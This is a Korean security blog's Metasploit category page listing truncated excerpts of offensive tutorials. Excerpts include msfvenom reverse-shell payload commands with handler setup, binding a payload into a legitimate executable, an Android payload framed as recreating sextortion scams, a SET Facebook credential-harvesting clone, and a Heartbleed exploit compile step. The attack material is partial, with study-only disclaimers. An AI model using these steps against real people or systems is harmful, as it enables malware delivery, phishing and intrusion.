728x90 반응형 Metasploit28 CALDERA를 통한 시나리오 침투 테스트(에이전트설치) 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 저번에 포스팅은 caldera를 설치하는 방법에 대해 작성해보았다. 2022.10.27 - [Metasploit/MiTRE ATT&CK] - MITRE ATT&CK 사이버 모의 공격 도구 이론과 실무 도서 후기 1 MITRE ATT&CK 사이버 모의 공격 도구 이론과 실무 도서 후기 1 박원형 교수님께 책을 선물받은 후 조금씩 읽어보았다. MITRE ATT&CK(이하 마이터)이란 단체는 해킹관련 업무 및 .. Metasploit/MiTRE ATT&CK 2022. 11. 17. 0 Nexpose 궁금증이 풀리는 순간 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 몇일전에 이러한 글을 올린적이 있다. 2022.11.06 - [Metasploit/Vulnerability] - Nexpose를 사용하면서 의문인점? Nexpose를 사용하면서 의문인점? 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음 blog.z3alous.xyz 이게.. Metasploit/Vulnerability 2022. 11. 11. 0 Nexpose를 사용하면서 의문인점? 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 최근에 업무때문에 스캐너를 사용해야하는 일이 있었다. 기존에 웹스캐너 등은 많이 사용해보았지만 시스템 스캐너 및 CVE 스캐너는 잘 사용해보지 않았다. 그래서 이 참에 써보아야해서 써보았는데... 총 3개를 써보았다. openvas(GVM) nexpose nessus 이렇게 3개를 사용했는데.. nexpose를 사용하면서 궁금한 점이 생겼다. 일단 환경은 아래와 같이 구성하여 테스트를 하였다. victim.. Metasploit/Vulnerability 2022. 11. 6. 0 MITRE ATT&CK 사이버 모의 공격 도구 이론과 실무 도서 후기 1 박원형 교수님께 책을 선물받은 후 조금씩 읽어보았다. MITRE ATT&CK(이하 마이터)이란 단체는 해킹관련 업무 및 공부를 하는 사람들 사이에서는 유명한 단체이다. 정보수집을 시작으로 하여 지속성을 유지하는 등의 기술들을 나열하고 해당 기술들에 대한 설명 등 쉽게 말해 해킹이 이루어지는 순서와 해킹단체들의 공격 기법 등을 다루는 단체이다. 공식 홈페이지는 https://attack.mitre.org/ 이다. 사이버 모의 공격 도구 이론과 실무(이하 책이라고 칭함)는 마이터에서 작성되어 있는 기술들을 기반으로 하여 시나리오 기반의 모의훈련 및 공격이 가능한 Caldara에 대하여 다룬다. 현재 클라우드(Cloud)의 사용이 증가함에 따라 많은 해킹 공격들이 일어나고 있다. 이에 각종 침해사고들이 일어나.. Metasploit/MiTRE ATT&CK 2022. 10. 27. 0 Apache Commons Text RCE(CVE-2022-42889 취약점 ) 해당 글은 해킹내용을 포함하고 있으며, 공부용으로 작성된 것입니다. 해당 내용을 기반으로 해킹을 시도하거나 취약점을 악용할 경우 모든 행위에 대한 책임은 악용한 사람(사용자)에게 있습니다. 악용하지마세요! 최근에 Apache Commons Text라는 라이브러리에서 원격코드실행 취약점이 발견되어서 패치가 되었다. 취약버전은 commons text 1.5 ~ 1.9라고 발표되었다. 패치는 1.10에서 이루어졌다. NVD의 내용의 원문을 확인해보면 Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpol.. Metasploit/Vulnerability 2022. 10. 24. 0 [책소개] MITRE & ATT&CK 사이버 모의 공격 도구 이론과 실무 책선물 정말 오랜만에 글을 작성하네요!!! 이젠 정말정말 블로그를 작성을 유지하는 것을 도전해봐야겠습니다. 제가 이렇게 오랜만에 글을 쓰는 이유는!!!!! ㅂΓ로ㅂΓ로 책소개를 하기위해서인데요!! 책 제목은 'MITRE & ATT&CK 사이버 모의 공격 도구 이론과 실무' 라는 책입니다. 자랑아닌 자랑을 해보자면 사실 책 저자이신 박원형 교수님께 책을 선물 받았어요! 제가 CERT팀에서 근무를 하다보니 MITRE ATT&CK 관련 업무도 진행을 하고있는데 마땅히 참고하거나 할만한 책들이 없었거든요? 근데 이게 뭐람??? 하늘에서 저의 마음을 들었는지 똭!! 이렇게 좋은 책을 출판해주셨단 말이죠? 책 표지부터 뭔가 느낌있지않습니까? 저는 행복하세요라는 단어를 엄청 베리베리 좋아한단말이예요? 그런 저를 위해 또 이.. Metasploit/MiTRE ATT&CK 2022. 10. 21. 2 Brutal – Toolkit to quickly create various payloads,powershell and virus attacks Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - 빠르고 다양한 payloads, 파워셸과 바이러스 공격을 위한 툴킷 https://github.com/screetsec/brutal Metasploit 2016. 12. 28. 0 Hack windows XP with armitage in kali 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다. 다음은 service postgresql start 명령어를 실행시킨 후 service metasploit start 를 실행해준다. 다음은 armitage를 실행시킨다. 이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면 이러한 창이 뜬다. tab창에서 hosts -> add hosts 를 누르면 이렇게 victim IP를 입력할 수있도록 뜬다. 등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes 그럼 콘솔창에 이러한 것을 확인할수 있다. 이제 취약점을 이용하여 공격하기 위해 어떠한.. Metasploit 2016. 12. 23. 0 Kali Linux by pass - Hack Windows metasploit tutorial 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22. 0 Hack windows with metasploit Java Applet JMX Remote Code Execution 모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지.. Metasploit 2016. 12. 22. 0 Heartbleed :) 하트블리드 heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다. heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다. 취약점을 실습해볼 때에는 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c여기서 다운을 받은 후 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21. 0 netool 설치방법(how to install netool) netool = script project 넷툴을 설치하기 위해 https://sourceforge.net/projects/netoolsh/ 들어가면 밑에와 같은 창이 뜬다. :) Git -> opensource-kali 를 클릭하게 되면 밑으로 쭉쭉 내리면 설치방법이 뜬당 :) 자세한건 유튜브로 Metasploit/Kali & Backtrack 2016. 12. 16. 0 요즘 유행 하던 몸캠 (기초방식) 요즘 몸캠이 유행을 했었다. 대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.) 그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :) 이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X 먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgresql 또한 시킨다. 궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다. 그 후 이제 악성코드를 만들어야 하는데...명령어 msfvenom을 이용 하여 만들어 보자.msfvenom -p android/meterpreter/.. Metasploit 2016. 12. 15. 0 파일합치기 (악성코드있는 파일만들기) 모든 사용의 법적 책임은 사용자 본인에게 있습니다. msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe 핸들러에서 프로세스 옮기는 명령어 migrate 프로세스 넘버 ex) migrate 1111 Metasploit 2016. 5. 24. 0 가짜 facebook만들기 모든 법적 책임은 사용자에게 있습니다.연구용으로만 사용하세요. 먼저 Kali linux or parrot linux에서 터미널을 open setoolkit을 입력한다. 입력을 하면 이러한 창을 확인 하실수 있습니다. 여기서 Social-Engineering Attacks를 해야하기 위해 1번을 입력합니다. 다음은 Website Attack Vectors을 위해 2번 여기에선 Credential Harvester Attack Method를 위해 3번 facebook을 만들기 위해 2번을 클릭합니다. 여기까지 하셨으면 반왔습니다. 2번을 하셨으면 IP를 입력하시면 되는데요! ip를 입력하면 이제 clone하기 위한 사이트를 입력하시면 됩니다. 저는 facebook.com을 하기위해 http://faceboo.. Metasploit 2016. 2. 11. 5 stagefright.py 모든 법적책임은 사용자에게 있습니다.연구용으로만 사용하시기 바랍니다. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10. 0 postgreSQL? postgreSQL??? service postgresql start Metasploit 2015. 12. 14. 0 kali linux 2.0 apt-get /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free Metasploit/Kali & Backtrack 2015. 12. 10. 0 msfvenom 주의! 모든 악의적인 법적 책임은 사용자에게 있습니다. 흠... 옛날에는 msfpayload 라는 명령어를 사용하여 백도어도 만들어 보고 했다.그러나 바끼고 난 후 오랜만에 써야해서 명령어를 하니 msfpayload가 없데여,,,검색결과 msfvenom 으로 바꼈길래 다시 공부를 하였다. 이제 이를 간단히 사용해보자!먼저 리스트를 보기위해 1. msfvenom -l 이렇게 리스트가 나온다. 만약 자기가 쓰고 싶은 payload를 찾았다면 2. msfvenom -p 원하는 payload -f 확장자 > 파일이름.확장자 root 폴더에 가면 파일이 생성되어있다. 이젠 핸들러를 향해!! 1. msfconsole 2. use exploit/multi/handler 3. sey payload [payload 명].. Metasploit 2015. 12. 6. 0 msf 이용하기 // beEF 사용법 msfconsole 을 이용하여 많은 정보를 찾을 수 있다.앞에서 보여준 정보들 뿐아니라 이메일 주소까지 알아낼수 있다. 하지만 msf 자체는 미국에 중점이 되어 한국 정보는 많이 없다는 점이다... (악의적인 행위의 책임은 사용자 본인에게 있습니다.) 1. use auxiliary/gather/search_email_collector 2. set domain [도메인] 3. run BeEFBeEF는 Browser Exploit Framework 로써 사용자 PC의 정보 수집부터 공격까지 가능한 도구이다. 주로 xss(크로스 사이트스크립트)공격 취약점을 찾기 위해 사용이된다. 그럼 xss란 무엇일까? 이는 웹에서 사용하는 클라이언트 스크립트를 통해 특정한 행동을 일으키는 취약점을 말한다. beEF 설치!.. Metasploit 2015. 12. 6. 0 이전 1 2 다음 728x90 반응형